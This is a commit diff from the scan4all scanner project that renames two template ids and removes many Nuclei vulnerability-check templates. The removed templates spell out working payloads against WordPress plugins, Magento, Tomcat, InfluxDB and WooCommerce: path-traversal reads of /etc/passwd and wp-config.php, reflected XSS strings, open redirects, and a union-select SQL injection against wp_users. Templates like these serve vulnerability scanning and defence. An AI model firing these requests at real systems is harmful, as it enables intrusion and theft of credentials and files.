Projects STRLCPY scan4all Commits a47b314c
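--- a/config/nuclei-templates/51pwn/CVE-2022-1388.yaml
+++ b/config/nuclei-templates/51pwn/CVE-2022-1388.yaml
@@ -1,4 +1,4 @@
-id: CVE-2022-1388
+id: CVE-2022-1388_51pwn
 
 info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE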
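--- a/config/nuclei-templates/51pwn/CVE-2022-22954.yaml
+++ b/config/nuclei-templates/51pwn/CVE-2022-22954.yaml
@@ -1,4 +1,4 @@
-id: CVE-2022-22954
+id: CVE-2022-22954_51pwn
 
 info:
  name: VMware Workspace ONE Access - Server-Side Template Injection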
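--- a/config/nuclei-templates/51pwn/rails6-xss.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: rails6-xss
-info:
- name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2)
- author:
- - l0ne1y
-requests:
-- matchers:
- - type: word
- part: body
- words:
- - javascript:alert(1)
- - type: status
- status:
- - 302
- - type: word
- condition: and
- part: header
- words:
- - 'Location: javascript:alert(22)'
- - text/html
- matchers-condition: and
- redirects: false
- path:
- - '{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0ajavascript:alert(22)'
- method: POST
-
-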
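--- a/config/nuclei-templates/cves/2022/CVE-2022-32159.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: CVE-2022-32159
-
-info:
- name: Open edX - Cross-site Scripting
- author: arafatansari
- severity: medium
- description: |
- Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
- reference:
- - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
- - https://nvd.nist.gov/vuln/detail/CVE-2022-32159
- - https://www.mend.io/vulnerability-database/CVE-2022-32159
- - https://github.com/internetarchive/infogami/pull/195/commits/ccc2141c5fb093870c9e2742c01336ecca8cd12e
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 5.4
- cve-id: CVE-2022-32159
- cwe-id: CWE-79
- metadata:
- comment: Hover the cursor on the redirect link
- shodan-query: http.html:"Open edX"
- verified: "true"
- tags: cve,cve2022,openedx,xss
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
-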
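--- a/config/nuclei-templates/exposed-panels/apache/tomcat-pathnormalization.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: tomcat-manager-pathnormalization
-
-info:
- name: Tomcat Manager Path Normalization
- author: organiccrap
- severity: info
- description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
- operating system.
- reference:
- - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization
- - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
- classification:
- cwe-id: CWE-200
- tags: panel,tomcat,apache
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/..;/manager/html'
- - '{{BaseURL}}/..;/host-manager/html'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'username="tomcat" password="s3cret"'
- - 'manager-gui'
- condition: and
-
- - type: status
- negative: true
- status:
- - 403
- - 401
-
-# Enhanced by mp on 2022/03/17
-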
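--- a/config/nuclei-templates/exposures/configs/magento-config.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: magento-config
-
-info:
- name: Magento Config Disclosure
- author: geeknik
- severity: medium
- metadata:
- shodan-query: http.component:"Magento"
- tags: config,exposure,magento
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/app/etc/local.xml"
- - "{{BaseURL}}/store/app/etc/local.xml"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "text/xml"
- part: header
-
- - type: word
- words:
- - "Magento"
- part: body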
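--- a/config/nuclei-templates/exposures/configs/magento-information-disclosure.yaml
+++ /dev/null
@@ -1,50 +0,0 @@
-id: magento-information-disclosure
-
-info:
- name: Magento - Information Disclosure
- author: ptonewreckin,danigoland
- severity: high
- description: |
- Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
- reference:
- - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
- metadata:
- verified: true
- tags: magento,exposure,credential,config
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/app/etc/local.xml"
- - "{{BaseURL}}/app/etc/local.xml.additional"
- - "{{BaseURL}}/store/app/etc/local.xml"
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "* Magento"
- - "<dbname>"
- condition: and
-
- - type: word
- part: header
- words:
- - "application/xml"
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
- - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
- - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
- - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"
-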
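--- a/config/nuclei-templates/misconfiguration/unauthenticated-influxdb.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: unauthenticated-influxdb
-
-info:
- name: Unauthentication InfluxDB Detection
- author: pussycat0x
- severity: high
- metadata:
- shodan-dork: InfluxDB
- tags: unauth,db,influxdb,misconfig
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"results":'
- - '"name":"databases"'
- condition: and
-
- - type: status
- status:
- - 200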
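--- a/config/nuclei-templates/tb.sh
+++ /dev/null
@@ -1,3 +0,0 @@
-myrsync ./ $HOME/MyWork/scan4all/config/nuclei-templates
-
-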
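--- a/config/nuclei-templates/vulnerabilities/other/concrete-xss.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: concrete-xss
-
-info:
- name: Unauthenticated reflected XSS in preview_as_user function
- author: shifacyclewla,hackergautam
- severity: medium
- description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
- reference:
- - https://hackerone.com/reports/643442
- - https://github.com/concrete5/concrete5/pull/7999
- - https://twitter.com/JacksonHHax/status/1389222207805661187
- tags: concrete,xss,cms
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '</iframe><svg/onload=alert("{{randstr}}")>'
-
- - type: word
- part: header
- words:
- - "text/html"
- - "CONCRETE5"
- condition: and
-
- - type: status
- status:
- - 200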
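--- a/config/nuclei-templates/vulnerabilities/other/gnuboard-sms-xss.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: gnuboard-sms-xss
-
-info:
- name: Gnuboard CMS - SMS Emoticon XSS
- author: gy741
- severity: medium
- description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
- reference:
- - https://sir.kr/g5_pds/4788?page=5
- - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
- metadata:
- verified: true
- shodan-query: http.html:"Gnuboard"
- tags: xss,gnuboard
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"0nuboard<svg onload=alert(document.domain)>"'
-
- - type: word
- part: header
- words:
- - "text/html"
-
- - type: status
- status:
- - 200
-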
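--- a/config/nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: accessibility-helper-xss
-
-info:
- name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
- author: dhiyaneshDK
- severity: medium
- description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
- reference:
- - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
- tags: xss,wordpress,wp-plugin,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "var wah_target_src = '';alert(document.domain);//';"
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
-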
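--- a/config/nuclei-templates/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: admin-word-count-column-lfi
-
-info:
- name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
- author: daffainfo,Splint3r7
- severity: high
- description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
- reference:
- - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- - https://wordpress.org/plugins/admin-word-count-column/
- remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/08/01
-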
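--- a/config/nuclei-templates/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: cab-fare-calculator-lfi
-
-info:
- name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
- author: Hassan Khan Yusufzai - Splint3r7
- severity: high
- description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
- reference:
- - https://www.exploit-db.com/exploits/50843
- - https://wordpress.org/plugins/cab-fare-calculator
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/08/01
-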
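--- a/config/nuclei-templates/vulnerabilities/wordpress/candidate-application-lfi.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: candidate-application-lfi
-
-info:
- name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
- author: dhiyaneshDK
- severity: high
- description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
- reference:
- - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 8.6
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/04/21
-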
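--- a/config/nuclei-templates/vulnerabilities/wordpress/db-backup-lfi.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: db-backup-lfi
-
-info:
- name: WordPress DB Backup <=4.5 - Local File Inclusion
- author: dhiyaneshDK
- severity: high
- description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
- reference:
- - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
- - https://www.exploit-db.com/exploits/35378
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/08/05
-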
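--- a/config/nuclei-templates/vulnerabilities/wordpress/feedwordpress-xss.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: feedwordpress-xss
-
-info:
- name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
- author: dhiyaneshDk
- severity: medium
- description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
- reference:
- - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
- tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
-
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- - |
- GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
- Host: {{Hostname}}
-
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"><img src=2 onerror=alert(document.domain)>" method="post">'
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
-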
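--- a/config/nuclei-templates/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: newsletter-manager-open-redirect
-
-info:
- name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
- author: akincibor
- severity: low
- description: |
- The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
- reference:
- - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
- metadata:
- verified: true
- tags: wp-plugin,redirect,wordpress,wp,unauth
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
-
- matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
-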
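--- a/config/nuclei-templates/vulnerabilities/wordpress/ninjaform-open-redirect.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: ninjaform-open-redirect
-
-info:
- name: Ninja Forms < 3.4.34 - Administrator Open Redirect
- author: dhiyaneshDk,daffainfo
- severity: low
- description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
- reference:
- - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
- tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
-
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- - |
- GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
- Host: {{Hostname}}
-
- req-condition: true
- cookie-reuse: true
- matchers:
- - type: dsl
- dsl:
- - 'status_code_1 == 302'
- - 'status_code_2 == 302'
- - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
- condition: and
-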
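--- a/config/nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: simple-image-manipulator-lfi
-
-info:
- name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
- author: dhiyaneshDK
- severity: high
- description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
- reference:
- - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/07/29
-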
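--- a/config/nuclei-templates/vulnerabilities/wordpress/sniplets-lfi.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: sniplets-lfi
-
-info:
- name: WordPress Sniplets 1.1.2 - Local File Inclusion
- author: dhiyaneshDK
- severity: high
- description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
- reference:
- - https://www.exploit-db.com/exploits/5194
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/07/29
-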
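--- a/config/nuclei-templates/vulnerabilities/wordpress/sniplets-xss.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: sniplets-xss
-
-info:
- name: Wordpress Plugin Sniplets - Cross-Site Scripting
- author: dhiyaneshDK
- severity: medium
- description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
- reference:
- - https://www.exploit-db.com/exploits/5194
- tags: xss,wordpress,wp-plugin,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "</script><script>alert(document.domain)</script>"
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
-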
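--- a/config/nuclei-templates/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: video-synchro-pdf-lfi
-
-info:
- name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
- author: Hassan Khan Yusufzai - Splint3r7
- severity: high
- description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
- reference:
- - https://www.exploit-db.com/exploits/50844
- - https://wordpress.org/plugins/video-synchro-pdf/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/07/29
-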
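--- a/config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ /dev/null
@@ -1,44 +0,0 @@
-id: wordpress-woocommerce-sqli
-
-info:
- name: Woocommerce Unauthenticated SQL Injection
- author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
- severity: critical
- description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
- reference:
- - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
- - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-89
- tags: wordpress,woocommerce,sqli,wp-plugin,injection
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
- - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'sqli-test'
- - 'attribute_counts'
- - 'price_range'
- - 'term'
- condition: and
-
- - type: word
- words:
- - 'application/json'
- part: header
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/21
-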
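--- a/config/nuclei-templates/vulnerabilities/wordpress/wp-church-admin-xss.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: wp-church-admin-xss
-
-info:
- name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference:
- - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
- tags: wordpress,xss,wp-plugin
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "</script><script>alert(document.domain)</script>"
- part: body
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
-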
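--- a/config/nuclei-templates/vulnerabilities/wordpress/wp-revslider-file-download.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: wp-revslider-file-download
-
-info:
- name: Wordpress Revslider - Local File Inclusion
- author: pussycat0x
- severity: high
- description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
- reference:
- - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- - https://cxsecurity.com/issue/WLB-2021090129
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- metadata:
- google-dork: inurl:/wp-content/plugins/revslider
- tags: wordpress,wp-plugin,lfi,revslider
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "'DB_NAME'"
- - "'DB_PASSWORD'"
- - "'DB_USER'"
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/07/29
-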
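--- a/config/nuclei-templates/vulnerabilities/wordpress/wp-whmcs-xss.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
-id: wp-whmcs-xss
-
-info:
- name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
- author: dhiyaneshDk
- severity: medium
- description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
- reference:
- - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- tags: wordpress,wp-plugin,authenticated,whmcs,xss
-
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- - |
- GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
- Host: {{Hostname}}
-
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "<strong><img src onerror=alert(document.domain)></strong>"
- condition: and
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
-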